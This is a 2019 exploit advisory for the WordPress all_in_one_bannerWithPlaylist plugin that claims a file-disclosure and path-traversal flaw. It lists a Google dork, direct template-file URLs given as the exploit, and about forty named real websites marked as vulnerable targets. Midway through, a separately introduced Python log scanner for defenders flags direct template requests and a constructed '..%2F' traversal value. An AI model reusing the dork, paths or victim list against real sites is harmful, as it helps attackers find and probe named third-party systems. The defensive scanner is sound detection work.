###########################################################################

# Exploit Title : WordPress all_in_one_bannerWithPlaylist Plugins 5.0.3 File Information Exposure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/01/2019
# Vendor Homepage : lambertgroupproductions.com ~ responsivejqueryslider.com
# Software Download Link : responsivejqueryslider.com/wordpressplugin/playlist_banner.html
# Software Information Link : themesinfo.com/wordpress-plugins/wordpress-all_in_one_bannerwithplaylist-plugin-dgut
# Tested On : Windows and Linux
# Category : WebApps
# Affected Versions : 1.0 - 1.2.8 - 1.4.7 - 1.8.1 - 1.8.5 - 2.0 - 2.1.3 - 2.2.0 - 2.4 - 4.0.25 - 4.5.16 - 4.9.9 - 5.0.3
# Exploit Risk : High
# Google Dorks : inurl:"/wp-content/plugins/all_in_one_bannerWithPlaylist/"
# Vulnerability Type : CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ]

###########################################################################

# Impact :
********

* WordPress all_in_one_bannerWithPlaylist 5.0.3 and other versions are prone to an arbitrary file disclosure vulnerability because the plugin fails to properly sanitize user-supplied input.

* An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in launching further attacks.

* An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.

* The product stores sensitive information in files or directories that are accessible to actors outside of the intended control sphere.

* The software uses external input to construct a pathname that is intended to identify a file or directory located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause it to resolve to a location outside of the restricted directory.

###########################################################################

# Exploit :
***********************

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php?page=all_in_one_bannerWithPlaylist_Manage_Banners

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_playlist_record.php

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_playlist_record.php?page=all_in_one_bannerWithPlaylist_Playlist

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/banners.php

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/help.php

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Manage_Banners

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Add_New

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Settings

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Playlist

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Help

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/playlist.php

/wp-content/plugins/lbg_zoominoutslider/tpl/preview.html

/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/settings_form.php
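The template files listed above live under the plugin's tpl/ directory and are meant to be loaded by the WordPress admin, not requested directly. The following Python script is an added example for defenders (not part of the original advisory and not the plugin's code): it parses web server access log lines in Apache combined format, URL-decodes the request target (twice, to catch double encoding), and flags two things: direct requests to the plugin's tpl/ files, and ".." traversal sequences in the path or query string (the CWE-22 pattern the Impact section describes). The log lines, client addresses and the traversal query value are constructed for the example; the plugin path prefix is taken from the advisory.

```python
import re
from urllib.parse import unquote

# Plugin template directory named in the advisory; direct hits here are suspicious.
PLUGIN_TPL_PREFIX = "/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/"

# Apache combined log format (client, identd, user, timestamp, request, status, ...).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3})'
)

# A ".." segment delimited by a slash, backslash, "=" (query value start) or string end.
TRAVERSAL_RE = re.compile(r"(?:^|[\\/=])\.\.(?:[\\/]|$)")


def decode_target(raw: str) -> str:
    """URL-decode the request target, repeating once to unwrap double encoding (%252e)."""
    decoded = raw
    for _ in range(2):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def classify(line: str):
    """Return a finding record for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = decode_target(m.group("target"))
    path, _, query = target.partition("?")
    findings = []
    if path.startswith(PLUGIN_TPL_PREFIX):
        findings.append("direct-template-access")
    if TRAVERSAL_RE.search(path) or TRAVERSAL_RE.search(query):
        findings.append("path-traversal-sequence")
    return {
        "ip": m.group("ip"),
        "status": int(m.group("status")),
        "target": target,
        "findings": findings,
    }


def scan(lines):
    """Return only the records that carry at least one finding, in log order."""
    hits = []
    for line in lines:
        rec = classify(line)
        if rec and rec["findings"]:
            hits.append(rec)
    return hits


# Constructed sample log lines (addresses from the RFC 5737 documentation range).
SAMPLE_LOG = [
    # Normal admin use: the plugin page is reached through wp-admin, not the tpl/ file.
    '203.0.113.5 - - [14/Jan/2019:10:00:01 +0000] "GET /wp-admin/admin.php?page=all_in_one_bannerWithPlaylist_Manage_Banners HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # Direct request to a template file from the advisory's list.
    '198.51.100.7 - - [14/Jan/2019:10:00:02 +0000] "GET /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php HTTP/1.1" 200 880 "-" "curl/7.64.0"',
    # Direct request carrying a URL-encoded traversal sequence in the query (constructed value).
    '198.51.100.7 - - [14/Jan/2019:10:00:03 +0000] "GET /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=..%2F..%2Fsecret.txt HTTP/1.1" 200 310 "-" "curl/7.64.0"',
    # Unrelated traffic.
    '203.0.113.9 - - [14/Jan/2019:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 9400 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["ip"], rec["status"], ",".join(rec["findings"]), rec["target"])
```

Run it against real logs by replacing SAMPLE_LOG with the file's lines. A 200 status on a flagged record means the template answered the direct request; a 403 or 404 indicates the file was blocked or removed, which is the expected state after patching or after adding the usual WordPress guard (exiting when ABSPATH is not defined) at the top of each template.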

###########################################################################

# Video Tutorials :
*****************

Step 1: Installation : youtube.com/watch?v=nYp94Ri8CME
Step 2: Manage Images : youtube.com/watch?v=gQezs4xWwSs
Step 3: Manage Text Over Image : youtube.com/watch?v=3wR64OtLx7Q
Step 4: Manage Multiple Banners : youtube.com/watch?v=3EfdmbjTvoY

###########################################################################

# Example Vulnerable Sites :
*************************

[+] lwd.org.kh/lc/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] copas-mpa.fr/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] okrls.org/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_playlist_record.php

[+] eagletonpoll.rutgers.edu/new-wp/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] fcsn.org/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] i-groupuk.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] princetonmanagement.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] looemarineconservation.org/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] liftandlube.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] lehmanneng.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] wallaces.ie/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] walkthewalkamerica.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] whoshapesourtimes.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] wemarket-lb.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] fight-club.tv/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] theayurway.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] wellingtonbridge.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] tuacapulco.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] mmojam.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] moebelaktion.ch/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] aquapools.org/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] huris.nl/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] certifiedtreeservices.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] park-med.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] llcform.us/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] krankas.sk/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] truescapemo.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] thereverendesquire.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] thebarrebelles.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] theaxess.net/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] ltsa.com.br/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] interkomitet.uz/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] avcaix.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] schoenphoto.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] yucatanbeachstand.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] roseumedicalcenter.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] eftportal.com.br/gilberto/homologacao/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] cappello.co.za/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

[+] tarwada.co.ae/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php

################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################